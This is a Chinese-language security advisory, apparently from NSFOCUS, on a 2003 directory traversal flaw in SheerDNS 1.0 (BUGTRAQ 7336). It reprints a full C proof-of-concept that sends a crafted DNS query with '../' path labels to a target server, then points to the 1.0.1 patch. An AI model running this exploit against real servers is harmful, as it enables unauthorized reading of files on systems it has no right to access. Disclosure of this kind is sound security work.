首页 -> 安全研究
安全研究
安全漏洞
SheerDNS远程信息泄露漏洞
发布日期:2003-04-14
更新日期:2003-04-21
受影响系统:
SheerDNS SheerDNS 1.0不受影响系统:
SheerDNS SheerDNS 1.0.1描述:
BUGTRAQ ID: 7336
SheerDNS是一款可替代主流DNS服务程序的系统,通过把每个记录存储在问中,更新记录不需要sheerdns进程重新启动,更新快速。
SheerDNS的directory_lookup()函数对外部请求缺少正确过滤,远程攻击者可以利用这个漏洞进行目录遍历攻击,可能以DNS进程权限查看系统任意文件信息。
SheerDNS通过文件获得数据,因此对于区域的类型记录请求从如下文件位置获得:
/var/sheerdns/<zone>/<type>
但是,SheerDNS 1.0.0没有充分过滤区域的请求,使用特殊构建的DNS请求,可能以SheerDNS进程权限(通常是root)读取任意目录内容。
<*来源:Jedi/Sector One (j@pureftpd.org)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=105033706014908&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*
* SheerDNS 1.0.0 directory traversal POC.
* Jedi/Sector One <j@pureftpd.org>
*/
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <getopt.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
void fill(char * const msg_, size_t *len)
{
register char *msg = msg_;
/* ID */
*msg++ = 2;
*msg++ = 4;
/* QR/OPCODE/AA/TC/RD/RA/Z */
*msg++ = 5;
*msg++ = 0;
/* QDCOUNT */
*msg++ = 0;
*msg++ = 1;
/* ANCOUNT */
*msg++ = 0;
*msg++ = 0;
/* NSCOUNT */
*msg++ = 0;
*msg++ = 0;
/* ARCOUNT */
*msg++ = 0;
*msg++ = 0;
/* QUERY */
*msg++ = 3; strcpy(msg, "../"); msg += 3;
*msg++ = 2; strcpy(msg, "./"); msg += 2;
*msg++ = 2; strcpy(msg, "./"); msg += 2;
*msg++ = 2; strcpy(msg, "./"); msg += 2;
*msg++ = 2; strcpy(msg, "./"); msg += 2;
*msg++ = 12; strcpy(msg, "/tmp/passwd"); msg += 11; *msg++ = 0;
*msg++ = 0;
/* QTYPE */
*msg++ = 0;
*msg++ = 1;
/* QCLASS */
*msg++ = 0;
*msg++ = 1;
/* FCS */
*msg++ = 0xc8;
*msg++ = 0x4c;
/* STOP */
*msg++ = 0x7e;
*len = (size_t) (msg - msg_);
}
void usage(const char * const prgname)
{
printf("Usage : %s [-s <source host>] -t <target host>\n",
prgname);
exit(0);
}
int main(int argc, char *argv[])
{
char msg[65500];
struct addrinfo hints, *res;
const char *source_host = NULL;
const char *target_host = NULL;
size_t len;
int kindy;
int fodder;
while ((fodder = getopt(argc, argv, "s:t:")) != -1) {
switch (fodder) {
case 's' :
if ((source_host = strdup(optarg)) == NULL) {
perror("strdup");
return 1;
}
break;
case 't' :
if ((target_host = strdup(optarg)) == NULL) {
perror("strdup");
return 1;
}
break;
default :
usage(argv[0]);
}
}
if (source_host == NULL || target_host == NULL) {
usage(argv[0]);
}
fill(msg, &len);
memset(&hints, 0, sizeof hints);
hints.ai_family = AF_UNSPEC;
hints.ai_addr = NULL;
if ((fodder = getaddrinfo(source_host, NULL, &hints, &res)) != 0) {
fprintf(stderr, "getaddrinfo : %s\n", gai_strerror(fodder));
return 1;
}
if ((kindy = socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) {
perror("socket");
return 1;
}
if (bind(kindy, (struct sockaddr *) res->ai_addr,
res->ai_addrlen) != 0) {
perror("bind");
return 1;
}
memset(&hints, 0, sizeof hints);
hints.ai_family = AF_UNSPEC;
hints.ai_addr = NULL;
if ((fodder = getaddrinfo(target_host, "domain", &hints, &res)) != 0) {
fprintf(stderr, "getaddrinfo : %s\n", gai_strerror(fodder));
return 1;
}
if (sendto(kindy, msg, len, 0, (const struct sockaddr *) res->ai_addr,
(socklen_t) res->ai_addrlen) <= (ssize_t) 0) {
perror("sendto");
return 1;
}
(void) close(kindy);
return 0;
}
建议:
厂商补丁:
SheerDNS
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
SheerDNS Upgrade sheerdns-1.0.1.tar.gz
http://threading.2038bug.com/sheerdns/sheerdns-1.0.1.tar.gz
浏览次数:3164
严重程度:0(网友投票)
绿盟科技给您安全的保障